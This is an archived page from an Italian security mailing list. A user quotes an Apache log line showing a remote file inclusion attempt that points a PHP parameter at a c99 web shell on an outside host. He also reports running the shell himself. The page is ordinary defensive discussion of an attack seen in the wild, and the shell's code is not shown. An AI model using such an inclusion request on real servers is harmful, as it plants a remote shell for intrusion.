
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
Archivio: Gennaio 2008 ml@sikurezza.org Soggetto: Re: [ml] shell 99 Mittente: Alberto Trivero Data: Thu, 31 Jan 2008 20:08:09 +0100 (CET)
Il giorno 30/gen/08, alle ore 00:31, David Galligani ha scritto:
Ciao ragazzi ,
innanzi tutto grazie a tutti coloro che mi hanno risposto sul tema dell' ecommerce .
Mi trovo a scrivervi di nuovo , perchè stavo guardando i log del mio apache2 ( alla tv non danno niente di interessante :D ) .
E ho trovato questo :
81.246.45.219 - - [29/Jan/2008:21:29:34 +0100] "GET /admin/ business_inc/saveserver.php?thisdir=http://80.231.130.12/wwwroot/c99.txt? HTTP/1.1" 404 231
Incuriosito sono andato a vedere questo c99.txt , che di txt ha veramente poco
Non pago , me lo sono scaricato per vedere che faceva , l'ho installato sul mio portatile e l'ho fatto girare .
Risultato , una pseudo shell in php ( devo dire molto carina ) con cui sono riuscito a navigare fino alla / , anche se non mi faceva vedere files su cui non avevo permessi ...
Inoltre , ha tentato di mandare varie mail :
[...]
Qualcuno sa qualcosa di piú su questo exploit ?
In caso qualcuno volesse studiarselo lo trova qui di seguito ( in attach non me lo fa mandare l'antivirus ...)
Ciao
David
Saluti,
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005